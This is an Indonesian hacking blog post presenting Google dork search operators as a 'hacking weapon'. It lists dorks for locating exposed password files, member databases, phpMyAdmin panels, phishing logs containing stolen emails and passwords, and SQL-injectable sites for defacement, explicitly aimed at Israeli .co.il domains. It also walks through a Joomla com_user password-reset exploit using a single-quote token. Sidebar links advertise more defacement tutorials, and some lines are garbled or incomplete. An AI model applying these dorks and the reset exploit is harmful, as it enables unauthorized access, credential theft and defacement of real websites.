Pasti Banyak Yang Bertanya-Tanya Apa Sih Itu Dork.? , Gunainnya Gmana.?
Klau Ada Yang Belum Mengerti, Langsung Aja Baca Baik Baik.!!!
Google dork sebagai senjata hacking
Banyak pencarian yang kita inginkan pada search engines tidak
seperti yang diharapkan, mengapa? karena keyword yang anda masukan
kurang sesuai dengan keyword-keyword yang tersimpan di mesin search
engines.
Sehingga untuk mempermudahnya Google menyediakan fasilitas-fasilitas
(dork), untuk mempermudahkan suatu pencarian, bahkan kita juga dapat
melakukan hacking (melihat password) account orang lain yang terindex
oleh google.
Pengenalan tentang google dorks :
Type-type dalam penggunaannya ada beberapa macam diantaranya:
intitle
allintitle
(Mencari judul/title pada suatu web)
inurl
allinurl
(Mencari suatu string yang terdapat pada url)
filetype
(Mencari suatu file secara lebih spesifik)
(www.google.c.id/help/faq_filetypes.html)
allintext
(Mencari suatu nilai string dalam suatu web)
site
(Mencari pada web tertentu)
link
(Mencari web2 yang mempunyai link pada web yang di pilih)
contoh dalam pengguunaannya:
Apabila kita ingin mencair sebuah lagu dari aveng*d maka kita ketikan sja di google seperti ini
intitle:"index of/avenged"
dan apa hasilnya, akan kelihatan semua kumpulan lagu2 tsb, dan dengan mudah untuk kita mendownloadnya.
Pengertian diatas, mksdnya biasanya dalam sebuah databse file web
terdapat kata ( index of ) maka kita gunaka fungsi intitle untuk
mencari sebuah title yang berkaitan dengan kata ( index of ), llu
ketikan kata aveng*d agar google mencari database file tentg kata-kata
aveng*d
Apabila kita ingin mencair sebuah skripsi maka kita ketikan sja di google seperti ini
intitle:"index of" "skripsi" site:.ac.id
mksudnya site:ac.id itu biasanya url untuk kampus berakhiran .ac.id
dan ini contoh2 lain dalam penggunaan google dork
inurl:"guest | book" "html allowed"
inurl:password.log
intitle:"index of" password.txt site:my
intitle:"index of" admin.mdb
intitle:"index of" member.mdb
intitle:"phpmyadmin" "running on localhost"
intitle:"index of" "data base" site:id
inurl:database.inc site:id
inurl:connector.txt site:id
site:id filetype:.doc
sehingga kita bisa menggunakan google ini untk senjata hacking kita:
misalkan kita ingin mencoba untuk menembus pada web dari j**mla dengan menggunakan token (').
biasanya url ketika memasukan token tsb adlah
*******.com/index.php?option=com_user&view=reset&layout=confirm
di url tsb terdapat tulsan option=com_user
mka dgn sedikit logika, kita coba menggunakan type ( inurl ) u/ mencari url yg berkaitan dengan kata option=com_user
ketikan di google >>>>> inurl:"option=com_user"
Contoh :
target/index.php?option=com_user&view=login
lalu hapus pada url (/index.php?option=com_user&view=login) dan ganti url tersebut menjadi
target/index.php?option=com_user&view=reset&layout=confirm
lalu ketikan token '
dan apa hasilnya, password sudah bisa kita reset ulang,,,,
sekarang tinggal bagaimana kita meng-applikasikan kata tersebut agar bisa mencari celah pada suatu URL website.
- Dork Email
f
- Dork Rapidshare
Expiration-date:*2010 +login: rapidshare.com
Note : Date nya tinggal ganti sesuka kita, mau di ubah ke 2011- 2012- 2013. Etc
Dork Fake Login
Untuk mencari email beserta Password hasil phishing bisa jga menggunakan google Dork
search z di google dengan dork ini
- DORK =
intext:"Date Submitted" intext:"password" intext:"email" inurl:"logs.txt"
Dork Untuk Defacing (The Best Dork)
Sebagian Dork untuk Aksi Deface
Sekarang tinggal copy salah satu Dork diatas, di google.com/.co.id Etc & liat hasilnya ^_^
Note : Tulisan yang bercetak tebal (berwarna kuning) adalah domain
dari target situs yang akan kita deface, Kali ini saya menggunakkan
domain .co.il (israel)
Untuk memudahkan dan memaksimalkan penggunaan dork, bisa saja mengganti domain di search engine ‘y.
www.google.com.my Etc
atau
seperti penggunaan google dork diatas (Nama domain/target di simpan dibelakang Dork Ex: allinurl:"union+all+select" site:co.il )
Sekian dulu smoga bermanfaat
Source ; http://ycs-team.blogspot.co.id/
Facebook : https://www.facebook.com/marselERROR
Recent
Weekly
-
Sekarang Lanjut Ke Tutorial Selanjutnya :v "Tutorial Deface Dengan Roxy File Manager" , OK . Langsung A...
-
Ketemu Lagi Ama Saya Sitamvan Dari Gua Hantu :v :v Sekarang Saya Akan Ngeshare Tutorial "Cfg-ContactForm File Upload Vulne...
-
Oke Karna popoji lagi bomming :v saya mau buat tutor deface CMS Popoji Udh langsung no bnyk kecot :v DORK inurl:"/detailpost site:sc...
-
Admin Tamvan Kembali :) . Skarang sya bkal nge share "Tutorial Deface Dengan SQL Manual" Sebenarnya Exploit ini s...
-
Assalamualaikum :D Sekarang Saya Akan Membagikan Tutorial Wordpress Plugins impact-template-editor Vulnerability Yups, Plugins ini pun...
-
Halluuu . Sekarang Saya Akan Membahas "Tutorial Deface Dengan Default User Admin" Ini Teknik Yang Sering Saya Gunakan...
-
^_^ Assalamualaikum ^_^ Maaf Baru Ngepost lagi , Jaringan lelet + udah bosan ngeblog lagi -_- . Mumpung jringan cepet sekarang say...
-
Hallo Gans skarang admin tamvan ini akan share tutor yg jos . Dapatnya sih dari blog teman :D , dan saya coba exploitnya trny...
-
Assalamualaikum ^_^ Sekarang saya lagi mau bagi bagi tutor nih namanya "Tutorial Deface Dengan Jdownloads" Langsung a...
-
Hallo Gan , skarang sya mau share tutorial "Tinymce Images File Upload Vulnerable" , tdi sya mau nge deface , ehh malah da...
Makasih bang ,,,
BalasHapussama" , terimakasih sudah kunjungi blog kami
BalasHapus